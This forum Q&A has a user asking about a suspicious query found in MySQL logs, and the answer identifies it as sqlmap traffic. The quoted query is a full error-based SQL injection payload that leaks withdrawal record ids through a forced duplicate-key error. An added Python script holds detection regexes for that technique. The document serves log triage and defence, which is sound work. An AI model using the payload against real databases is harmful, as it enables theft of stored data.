 

Mysql Injection query?

Tags:

mysql

SELECT `u`.`login`,`u`.`fullname`,`ur`.`user_id`,`ur`.`refer_id` 
FROM 
`user_referrals` AS `ur` 
 JOIN 
(SELECT id,login,fullname FROM users WHERE id=4  
 AND 
(SELECT 3039 FROM 
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT 
MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
 FROM 
 cms_withdrawal WHERE user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AS `u`  
WHERE (ur.user_id=4135 AND ur.refer_id=4 AND (SELECT 3039 
FROM
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT MID((IFNULL(CAST(id AS 
CHAR),0x20)),1,54) FROM cms_withdrawal WHERE user_id=3454 and 
timestamp>1494075125 LIMIT 1,1),0x7176716271,FLOOR(RAND(0)*2))x  
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) OR (ur.refer_id=4135 AND 
ur.user_id=4 AND (SELECT 3039 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,
(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
FROM cms_withdrawal WHERE 
user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AND ur.level=1 LIMIT 1

I see it in my mysql logs. What is that?

Dmitrij Kotenev asked Dec 14 '25 04:12


1 Answer

That query is part of an sqlmap attack. Sqlmap is used for penetration-testing (hacking) purposes.

In this issue you can see that the code is part of what they use in their statements >> http://github.com/sqlmapproject/sqlmap/issues/209

sqlmap: http://github.com/sqlmapproject/sqlmap

Xatenev answered Dec 16 '25 20:12
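A log-triage sketch for the pattern in the question, as an added example that is not part of the original question or answer and is not sqlmap's code: it flags logged queries carrying the FLOOR(RAND(0)*2) ... GROUP BY construct, decodes the hex marker strings, and reports which table the injected subquery read and which comparison the payload was appended to. The function names and the sample lines (shortened from the query above) are constructed for illustration.

```python
import re

# Shape of the payload in the question: (SELECT n FROM(SELECT COUNT(*),CONCAT(...
# grouped on FLOOR(RAND(0)*2), which forces a duplicate-key error carrying the value.
PAYLOAD = r"\(\s*SELECT\s+\d+\s+FROM\s*\(\s*SELECT\s+COUNT\(\*\)"
PAYLOAD_START = re.compile(PAYLOAD, re.I)
FLOOR_RAND = re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"\bGROUP\s+BY\b", re.I)
# The "column=value" comparison the payload was appended to.
INJECTED_AT = re.compile(r"([\w.`]+)\s*=\s*(\w+)\s+AND\s*" + PAYLOAD, re.I)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){3,})", re.I)  # 3+ bytes, skips 0x20
INNER_FROM = re.compile(r"\bFROM\s+([A-Za-z_][\w.]*)", re.I)

def analyze(query):
    """Return triage details if the query carries the pattern, else None."""
    if not (FLOOR_RAND.search(query) and GROUP_BY.search(query)):
        return None
    start = PAYLOAD_START.search(query)
    payload = query[start.start():] if start else query
    markers = sorted({bytes.fromhex(h).decode("ascii", "replace")
                      for h in HEX_LITERAL.findall(payload)})
    # INFORMATION_SCHEMA only supplies rows for the GROUP BY; it is not the target.
    tables = sorted({t for t in INNER_FROM.findall(payload)
                     if not t.upper().startswith("INFORMATION_SCHEMA")})
    params = sorted({f"{c.replace('`', '')}={v}" for c, v in INJECTED_AT.findall(query)})
    return {"markers": markers, "tables": tables, "injected_after": params}

def scan(lines):
    """Return (line_number, details) for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := analyze(line))]

# Constructed sample: query text only, one normal query and one shortened
# from the logged query in the question.
SAMPLE = [
    "SELECT id,login,fullname FROM users WHERE id=4 LIMIT 1",
    "SELECT id,login,fullname FROM users WHERE id=4 AND "
    "(SELECT 3039 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT "
    "MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) FROM cms_withdrawal WHERE "
    "user_id=3454 LIMIT 1,1),0x7176716271,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE):
        print(n, hit)
```

The "injected_after" value points at the application parameter that was concatenated into the SQL string and needs a parameterized query; searching application error output for the decoded markers shows whether a value was returned to the client.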


